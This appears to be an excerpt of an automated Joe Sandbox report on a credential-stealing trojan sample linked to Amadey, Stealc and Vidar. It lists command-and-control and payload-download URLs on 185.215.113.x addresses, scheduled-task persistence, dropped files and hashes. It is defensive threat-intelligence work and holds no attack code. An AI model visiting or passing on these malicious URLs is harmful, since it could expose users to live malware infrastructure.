https://www.google.com/favicon.ico	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.cloudflare-dns.com/dns-query	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.100E	4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Web Data.12.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://185.215.113.100t1q	4bea71e542.exe, 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Web Data.12.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.php-B	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://msn.com	data_10.13.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phpkD	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Web Data.12.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.phpG	explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php&DlR	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phptch	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.100/=g	44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100	44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp, 4bea71e542.exe, 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.16/steam/random.exeg	explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpw	explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe6522	explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Web Data.12.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.php_D	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myaccount.google.com/signinoptions/passwordC:	ca798c703b.exe, 00000008.00000002.4446165257.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php/5	4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.office.com/	Top Sites.12.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.16/well/random.exe	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	25%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.100/e2b1563c6670f193.php/	4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.phpKBzS	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Web Data.12.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php2	44affe150c.exe, 00000005.00000002.2189503708.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php.ETS	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.100/e2b1563c6670f193.php6	44affe150c.exe, 00000005.00000002.2189503708.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php#A	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	24%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data.12.dr	false	URL Reputation: safe	unknown
https://www.office.com/Office	Top Sites.12.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.100%6	44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/steam/random.exe65	explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.100/t	4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php1E_S	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.100/x	4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php_BfS	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.100/w	44affe150c.exe, 00000005.00000002.2189503708.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.phpTD	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php0	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://bzib.nelreports.net/api/report?cat=bingbusiness	Reporting and NEL.13.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49##Le	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php53001	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpW-jS	explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpaB	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.100/e2b1563c6670f193.php~	4bea71e542.exe, 00000006.00000002.2260142696.000000000183E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php000	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php~D	explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpG-zS	explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php.	explorti.exe, 00000004.00000003.2392155979.0000000001481000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.19/d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#0	explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.100	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.80.110	unknown	United States	15169	GOOGLEUS	false
142.251.111.84	unknown	United States	15169	GOOGLEUS	false
23.55.235.170	unknown	United States	20940	AKAMAI-ASN1EU	false
142.251.40.228	unknown	United States	15169	GOOGLEUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.65.238	unknown	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.251.35.174	unknown	United States	15169	GOOGLEUS	false
142.250.65.174	unknown	United States	15169	GOOGLEUS	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
142.251.167.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502392
Start date and time:	2024-09-01 06:27:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@83/333@18/17
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 163.177.116.4, 192.229.221.95, 13.107.42.16, 108.177.15.84, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.19.126.145, 2.19.126.152, 216.58.212.163, 142.250.184.195, 2.23.209.140, 2.23.209.149, 2.23.209.185, 2.23.209.176, 2.23.209.133, 2.23.209.130, 2.23.209.179, 2.23.209.187, 2.23.209.189, 20.74.47.205, 142.250.184.206, 142.250.65.227, 142.250.65.195, 142.250.65.163, 142.251.35.163, 142.251.40.99
Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, edgeassetservice.afd.azureedge.net, arc.msn.com, iris-de-prod-azsc-v2-frc-b.francecentral.cloudapp.azure.com, e86303.dscx.akamaiedge.net, clients2.google.com, ocsp.digicert.com, www.bing.com.edgekey.net, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, arc.trafficmanager.net, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, bzib.nelreports.net.akamaized.net, fonts.gstatic.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, edgeassetservice.azureedge.net, azureedge-t-prod.trafficmanager.net, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net
Execution Graph export aborted for target 44affe150c.exe, PID 4592 because there are no executed function
Execution Graph export aborted for target 4bea71e542.exe, PID 6604 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 1288 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 3624 because there are no executed function
Execution Graph export aborted for target file.exe, PID 5284 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:28:01	API Interceptor	13214377x Sleep call for process: explorti.exe modified
00:28:09	API Interceptor	47x Sleep call for process: 4bea71e542.exe modified
06:27:52	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
06:28:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_E81D8DD3EACFA71E827377A4597DF902 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
06:28:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_E81D8DD3EACFA71E827377A4597DF902 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
23.55.235.170	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe	Get hash	malicious	Unknown	Browse
	GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe	Get hash	malicious	Unknown	Browse
	lmiXXjKzpz.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.19912.30037.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0032.t-0009.t-msedge.net	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.60
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	http://6b5b555f2a01cd6960fbc4a3facee2c37f07856d013f850d27993a35f2.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://multicoinsystemnode.firebaseapp.com/	Get hash	malicious	Unknown	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	Order enquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.60
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.9
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.9
	file.exe	Get hash	malicious	Unknown	Browse	23.44.133.38
	aisuru.i686.elf	Get hash	malicious	Unknown	Browse	172.232.34.247
	file.exe	Get hash	malicious	Unknown	Browse	23.54.161.105
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.9
	file.exe	Get hash	malicious	Unknown	Browse	23.55.235.170
	file.exe	Get hash	malicious	Unknown	Browse	23.219.161.132
	file.exe	Get hash	malicious	Unknown	Browse	23.219.161.132
	file.exe	Get hash	malicious	Unknown	Browse	23.219.161.132
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.17
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.60
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	13.107.246.57
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	http://juno-100505.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	http://6b5b555f2a01cd6960fbc4a3facee2c37f07856d013f850d27993a35f2.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.73
	http://telstra-105864.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	http://att-108937.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	http://telstra-100127.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.60
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	13.107.246.57
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	13.107.246.60
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	http://juno-100505.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	http://6b5b555f2a01cd6960fbc4a3facee2c37f07856d013f850d27993a35f2.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.73
	http://telstra-105864.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	http://att-108937.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	http://telstra-100127.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	184.28.90.27 20.12.23.50
	https://mychaseexclusive.ru/case?token	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	184.28.90.27 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	184.28.90.27 20.12.23.50
	file.exe	Get hash	malicious	Unknown	Browse	184.28.90.27 20.12.23.50
	https://uppholldlgins.mystrikingly.com/	Get hash	malicious	Unknown	Browse	184.28.90.27 20.12.23.50
	http://juno-100505.weeblysite.com/	Get hash	malicious	Unknown	Browse	184.28.90.27 20.12.23.50
	https://danadompetdigital.zesty.my.id/	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.12.23.50
	http://www.chacararecantodosol.com.br/wp-admin/js/milissa/swisssa2024/swisscom/index2.php	Get hash	malicious	Unknown	Browse	184.28.90.27 20.12.23.50
	http://6b5b555f2a01cd6960fbc4a3facee2c37f07856d013f850d27993a35f2.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.12.23.50

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\360d0454-832a-4557-b272-e47c6700cf82.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26191
Entropy (8bit):	6.054553443046567
Encrypted:	false
SSDEEP:	768:LMGQ7FCYXGIgtDAWtJ4nNHvTbcQRz69G9Cbh02td7:LMGQ5XMBGaQRzN9Clj
MD5:	64653D8E37C2969D889CF4B346A63CB7
SHA1:	020D48D073924C4D549B57B90A76F48AB17113E4
SHA-256:	ED2DF52EE4DF2246016BCBF9AE735C92846614E4D40E763EB2374053E0AEBBCA
SHA-512:	3800E1CEB4A65008DF8676F9120DEDF72EEA6853896CE3DC18AE7D3820325DFC5EBA756F92215F8EF3643D4084D078EF37219A7B5D195A9CB14B4513C7296B77
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\48e54626-1b2b-4c31-afae-de2313a6cae2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	71535
Entropy (8bit):	6.072301630324593
Encrypted:	false
SSDEEP:	1536:LMGQ5XMBGmUQNJCiTuSvvkF3QwcgPJbD7zV0tGlfQRzN9CUj:LMrJM8lIIiaCMZ3cgPJbp0tG1QRzN9Ci
MD5:	392AF7AC3E92683F83A5DD95DD502F14
SHA1:	A782D756B276E3E9E598B10169EF28F709F4F42E
SHA-256:	B8714DEAD2699A3F1F16B63FAF574F0E2C2B13770E88D062188988693BF3BF81
SHA-512:	092B781141A38CA5610F777959A3F2F9D45372033B6C2C23249CD19E60D715F813C8FC8400AB2A1C68993F63EABBD0E908FF746C869B57398FB23082443AB745
Malicious:	false
